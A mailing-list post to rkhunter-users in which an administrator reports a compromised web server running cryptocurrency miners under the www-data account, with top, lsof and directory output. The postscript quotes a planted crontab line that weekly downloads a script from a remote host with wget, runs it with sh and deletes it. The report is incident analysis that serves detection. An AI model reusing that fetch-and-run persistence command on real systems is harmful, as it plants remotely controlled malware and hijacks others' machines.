Good day I cant seem to find where to submit to potential problems to rkhunter, so hopefully the powers that be are listening and will take into consideration of what I found.
This morning, on one of the servers we manage, when we ran top we saw the two following processes. 5482 www-data 20 0 149m 44m 2368 S 750 0.6 228:25.51 jhprimeminer 5513 www-data 20 0 240m 4812 1176 S 8 0.1 1:33.89 minerd Doing a lsof on the pid we get: root@withheld-web01 /dev # lsof -p 5482 COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME jhprimemi 5482 www-data cwd DIR 0,16 160 112483832 /dev/shm/jhPrimeminer-master jhprimemi 5482 www-data rtd DIR 253,0 4096 2 / jhprimemi 5482 www-data txt REG 0,16 214680 112484110 /dev/shm/jhPrimeminer-master/jhprimeminer jhprimemi 5482 www-data mem REG 253,0 80712 134494 /lib/libresolv-2.11.3.so jhprimemi 5482 www-data mem REG 253,0 22928 131398 /lib/libnss_dns-2.11.3.so jhprimemi 5482 www-data mem REG 253,0 51728 131139 /lib/libnss_files-2.11.3.so jhprimemi 5482 www-data mem REG 253,2 93936 394581 /usr/lib/libz.so.1.2.3.4 jhprimemi 5482 www-data mem REG 253,0 14696 131151 /lib/libdl-2.11.3.so jhprimemi 5482 www-data mem REG 253,0 1437064 134496 /lib/libc-2.11.3.so jhprimemi 5482 www-data mem REG 253,0 131258 131411 /lib/libpthread-2.11.3.so jhprimemi 5482 www-data mem REG 253,0 90504 131467 /lib/libgcc_s.so.1 jhprimemi 5482 www-data mem REG 253,0 530736 131165 /lib/libm-2.11.3.so jhprimemi 5482 www-data mem REG 253,2 1043976 393286 /usr/lib/libstdc++.so.6.0.13 jhprimemi 5482 www-data mem REG 253,0 31744 131137 /lib/librt-2.11.3.so jhprimemi 5482 www-data mem REG 253,2 356608 393543 /usr/lib/libssl.so.0.9.8 jhprimemi 5482 www-data mem REG 253,2 1693344 393542 /usr/lib/libcrypto.so.0.9.8 jhprimemi 5482 www-data mem REG 0,16 35911 112457085 /dev/shm/lib/libgmpxx.so.4.3.2 jhprimemi 5482 www-data mem REG 0,16 531179 112457045 /dev/shm/lib/libgmp.so.10.1.2 jhprimemi 5482 www-data mem REG 253,0 128744 131416 /lib/ld-2.11.3.so jhprimemi 5482 www-data 0r CHR 1,3 0t0 1180 /dev/null jhprimemi 5482 www-data 1w CHR 1,3 0t0 1180 /dev/null jhprimemi 5482 www-data 2w FIFO 0,8 0t0 112228026 pipe jhprimemi 5482 www-data 3r REG 253,2 5814328 398692 /usr/lib/cgi-bin/php5 jhprimemi 5482 www-data 4u REG 253,3 0 57 /tmp/.z jhprimemi 5482 www-data 5u sock 0,6 0t0 112396829 can't identify protocol jhprimemi 5482 www-data 6u sock 0,6 0t0 112523621 can't identify protocol jhprimemi 5482 www-data 7u sock 0,6 0t0 112527946 can't identify protocol jhprimemi 5482 www-data 8u sock 0,6 0t0 112537877 can't identify protocol jhprimemi 5482 www-data 9u sock 0,6 0t0 112547857 can't identify protocol jhprimemi 5482 www-data 10u sock 0,6 0t0 113824599 can't identify protocol jhprimemi 5482 www-data 11u IPv4 114777055 0t0 TCP WITHHELD:39120->mta5.girltang.com:ircd (ESTABLISHED) < ---- SEE HERE jhprimemi 5482 www-data 12u IPv4 115198218 0t0 TCP WITHHELD:43904->ypool.net:10034 (ESTABLISHED) < ---- SEE HERE jhprimemi 5482 www-data 23w REG 253,4 373 1180063 /var/log/newrelic/php_agent.log jhprimemi 5482 www-data 26u unix 0xffff88014727e900 0t0 111962415 socket root@withheld-web01 /dev # lsof -p 5513 COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME minerd 5513 www-data cwd DIR 0,16 340 4738 /dev/shm minerd 5513 www-data rtd DIR 253,0 4096 2 / minerd 5513 www-data txt REG 0,16 592464 114161054 /dev/shm/minerd minerd 5513 www-data mem REG 253,0 80712 134494 /lib/libresolv-2.11.3.so minerd 5513 www-data mem REG 253,0 22928 131398 /lib/libnss_dns-2.11.3.so minerd 5513 www-data mem REG 253,0 51728 131139 /lib/libnss_files-2.11.3.so minerd 5513 www-data mem REG 253,0 1437064 134496 /lib/libc-2.11.3.so minerd 5513 www-data mem REG 253,0 131258 131411 /lib/libpthread-2.11.3.so minerd 5513 www-data mem REG 253,0 31744 131137 /lib/librt-2.11.3.so minerd 5513 www-data mem REG 253,0 128744 131416 /lib/ld-2.11.3.so minerd 5513 www-data 0r CHR 1,3 0t0 1180 /dev/null minerd 5513 www-data 1w CHR 1,3 0t0 1180 /dev/null minerd 5513 www-data 2w FIFO 0,8 0t0 112228026 pipe minerd 5513 www-data 3r REG 253,2 5814328 398692 /usr/lib/cgi-bin/php5 minerd 5513 www-data 4u REG 253,3 0 57 /tmp/.z minerd 5513 www-data 5u sock 0,6 0t0 112396829 can't identify protocol minerd 5513 www-data 6u sock 0,6 0t0 112523621 can't identify protocol minerd 5513 www-data 7u sock 0,6 0t0 112527946 can't identify protocol minerd 5513 www-data 8u sock 0,6 0t0 112537877 can't identify protocol minerd 5513 www-data 9u sock 0,6 0t0 112547857 can't identify protocol minerd 5513 www-data 10u sock 0,6 0t0 113824599 can't identify protocol minerd 5513 www-data 11u IPv4 114777055 0t0 TCP WITHHELD:39120->mta5.girltang.com:ircd (ESTABLISHED) minerd 5513 www-data 12u IPv4 115358897 0t0 TCP WITHHELD:48657->stratum01.hashco.ws:8888 (ESTABLISHED) minerd 5513 www-data 23w REG 253,4 373 1180063 /var/log/newrelic/php_agent.log minerd 5513 www-data 26u unix 0xffff88014727e900 0t0 111962415 socket Doing a clamscan it did not find anything. Doing a ls in /dev/shm/jhPrimeminer-master and /dev/shm/minerd root@withheld-web01 /dev # ls -la /dev/shm/jhPrimeminer-master total 236K drwxr-xr-x 3 www-data www-data 160 Nov 3 21:07 . drwxrwxrwt 10 root root 340 Nov 4 23:24 .. -rw-r--r-- 1 www-data www-data 2.6K Sep 17 08:22 .gitignore -rwxr-xr-x 1 www-data www-data 210K Nov 3 21:07 jhprimeminer -rw-r--r-- 1 www-data www-data 1.6K Sep 17 08:22 jhprimeminer.example.conf -rw-r--r-- 1 www-data www-data 2.0K Nov 2 07:05 Makefile -rw-r--r-- 1 www-data www-data 714 Sep 17 08:22 README.md drwxr-xr-x 3 www-data www-data 100 Sep 17 08:22 src root@withheld-web01 /dev # ls -la /dev/shm/minerd -rwxr-xr-x 1 www-data www-data 579K Jul 10 15:55 /dev/shm/minerd Looking at /dev/shm/jhPrimeminer-master/README.md Shows this is the code / project https://github.com/tandyuk/jhPrimeminer.git Hope fully this help the project or someone else out there. Sigh now to explain to the client. Regards Brent P.s. I just saw in cron cat /var/spool/cron/crontabs/www-data # DO NOT EDIT THIS FILE - edit the master and reinstall. # (/tmp/cron installed on Sun Nov 3 15:21:02 2013) # (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $) @weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1 ------------------------------------------------------------------------------ November Webinars for C, C++, Fortran Developers Accelerate application performance with scalable programming models. Explore techniques for threading, error checking, porting, and tuning. Get the most from the latest Intel processors and coprocessors. See abstracts and register http://pubads.g.doubleclick.net/gampad/clk?id=60136231&iu=/4140/ostg.clktrk _______________________________________________ Rkhunter-users mailing list Rkhunter-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/rkhunter-users
